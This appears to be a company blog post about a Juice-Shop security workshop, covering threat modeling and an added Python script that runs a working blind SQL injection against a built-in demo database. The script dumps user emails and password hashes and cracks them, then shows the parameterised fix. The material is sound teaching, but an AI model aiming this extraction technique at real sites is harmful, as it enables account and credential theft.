Cybehave was invited to lead a web application security workshop at Webstep in Trondheim. It made for an interesting evening after work hours with burritos, drinks, threat modeling and hacking of the excellent target practice app Juice-Shop from OWASP and @bkimminich. Juice-Shop looks like a typical e-commerce app, but it is deliberately built to contain a large number of hacking challenges and intentional vulnerabilities. If you want to try it yourself, head over to https://github.com/bkimminich/juice-shop and get started, or if you would like a Cybehave-run workshop based on this app, send us a request!
Webstep helps clients create and improve digital services and products, bridging the gap between technology and business.
Threat modeling and secure development workflows
Where do vulnerabilities come from? Basically there are two sources: design flaws and bugs. Design flaws are problems or misunderstandings at the architectural level, whereas bugs are implementation errors. Linting, static analysis, pair programming and code reviews are all great techniques for catching bugs, but they don't help much if the plan for what to implement is flawed in the first place: a flawlessly implemented endpoint that was never designed to check authorization is still broken. This is where threat modeling comes in as a great and necessary tool.
At the workshop we looked at threat modeling going through some key aspects:
- Limiting the scope
- Always explore multiple attack paths
- Quick recap of OWASP Top-10
- Key attack patterns (recon, social engineering + client side exploit combo, persistent access methods)
- Using a data flow diagram and trust boundaries to find potential injection points
- Prioritizing threats
- Creating good security requirements (clear purpose, testable, cost/benefit)
We also talked a bit about how this fits into the bigger picture: threat modeling –> backlog –> unit testing –> debugging –> automated security testing in the build pipeline. This was an interesting discussion because Webstep is a consulting company with a wide range of customers, so they have experience with many levels of DevOps implementation and maturity.
We have run a few hacking workshops before, and we always see that some people finish the challenges really quickly while others need a bit more time. We have tried to learn from this, so we only did the introduction as a live demo; for the rest of the workshop the devs, temporarily turned blackhats, were hacking away at their own pace. Some of the things we covered included:
- SQL injection, both basic and more advanced. We did a blind SQL injection to dump all usernames and password hashes, and went on to crack the hashes using rainbow tables. This is the typical "data breach" attack, and the cracking step only works because the hashes are unsalted: a salted, slow password hash (bcrypt, scrypt, Argon2) would have left the dump useless to a rainbow table.
- Various forms of cross-site scripting
- Various parameter injections
- Exploiting lots of very weak security features
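To make the blind SQL injection and hash-cracking chain above concrete, here is an added example that is not code from the workshop or from Juice-Shop. It builds a constructed in-memory SQLite shop with a `Users` table of unsalted MD5 hashes (an assumption chosen to mirror a legacy app; the account names and wordlist are invented), exposes a product search that concatenates user input into SQL, and then plays the attacker: a boolean oracle that only learns whether the search returned anything, a binary search over `unicode(substr(...))` to pull out each character of every email and hash, and a precomputed hash-to-password table standing in for a rainbow table. The same payload is also run against a parameterised version of the search to show the fix.

```python
"""Boolean-based blind SQL injection plus hash lookup, as an added example.
Not code from the Cybehave/Webstep workshop page or from Juice-Shop: the schema,
users, hashing scheme and wordlist below are all constructed for this demo."""
import hashlib
import sqlite3

# Constructed accounts. Unsalted MD5 is an assumption made to mirror a legacy
# web app; it is exactly what makes a precomputed-table attack work.
SAMPLE_USERS = [
    ("admin@juice-sh.op", "admin123"),
    ("jim@juice-sh.op", "ncc-1701"),
    ("bender@juice-sh.op", "OhG0dPlease"),
]
WORDLIST = ["123456", "password", "admin123", "ncc-1701", "letmein", "qwerty"]
REQUESTS = {"n": 0}  # how many HTTP-equivalent requests the attack needed

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the shop's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO Users (email, password) VALUES (?, ?)",
                     [(e, md5_hex(p)) for e, p in SAMPLE_USERS])
    conn.executemany("INSERT INTO Products (name) VALUES (?)",
                     [("Apple Juice",), ("Banana Juice",), ("Carrot Juice",)])
    return conn

# --- the vulnerable endpoint and its fix -------------------------------------
def search_products_vulnerable(conn, q: str) -> list:
    """String concatenation: the caller controls SQL syntax, not just a value."""
    sql = "SELECT name FROM Products WHERE name LIKE '%" + q + "%'"
    return [row[0] for row in conn.execute(sql)]

def search_products_safe(conn, q: str) -> list:
    """Parameterised: q is bound as data, so quotes and comments are inert."""
    sql = "SELECT name FROM Products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]

# --- the attacker's side -----------------------------------------------------
def oracle(conn, condition: str) -> bool:
    """True iff `condition` holds. The attacker never sees Users data directly,
    only whether the product search returned something (the 'blind' part)."""
    REQUESTS["n"] += 1
    payload = "Apple%' AND (" + condition + ") -- "
    return len(search_products_vulnerable(conn, payload)) > 0

def binary_search(conn, expr: str, lo: int, hi: int) -> int:
    """Find the integer value of a SQL expression in [lo, hi] with log2 queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_cell(conn, column: str, row: int, max_len: int = 64) -> str:
    """Recover one Users cell character by character (printable ASCII assumed)."""
    cell = f"(SELECT {column} FROM Users ORDER BY id LIMIT 1 OFFSET {row})"
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"length({cell}) >= {pos}"):
            break  # past the end of the string
        value += chr(binary_search(conn, f"unicode(substr({cell},{pos},1))", 32, 126))
    return value

def dump_users(conn) -> list:
    """Returns [(email, password_hash), ...] exactly as a breach dump would."""
    n = binary_search(conn, "SELECT count(*) FROM Users", 0, 1024)
    return [(extract_cell(conn, "email", i), extract_cell(conn, "password", i))
            for i in range(n)]

def crack(dump: list, wordlist: list) -> dict:
    """Precomputed hash->password table. A real rainbow table compresses this with
    hash/reduce chains; the lookup idea, and why salting defeats it, is the same."""
    table = {md5_hex(w): w for w in wordlist}
    return {email: table.get(h) for email, h in dump}

if __name__ == "__main__":
    db = build_db()
    dump = dump_users(db)
    print(f"dumped {len(dump)} users in {REQUESTS['n']} requests")
    for email, pw in crack(dump, WORDLIST).items():
        print(f"{email}: {pw or '<not in table>'}")
    # the same payload against the fixed endpoint is just a harmless search string
    print(search_products_safe(db, "Apple%' AND (1=1) -- "))
```

Two things worth noticing when you run it: the request counter shows why blind injection is noisy (roughly seven requests per recovered character, which is what makes it stand out in access logs), and the third account survives the cracking step only because its password is not in the wordlist, not because the hashing was any better. Against the parameterised search the whole payload is treated as a literal pattern and simply matches nothing.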
Feedback from the team was that this was fun and a great way to learn! If you want to run a workshop like this too with your team, let us know and we can arrange something on short notice.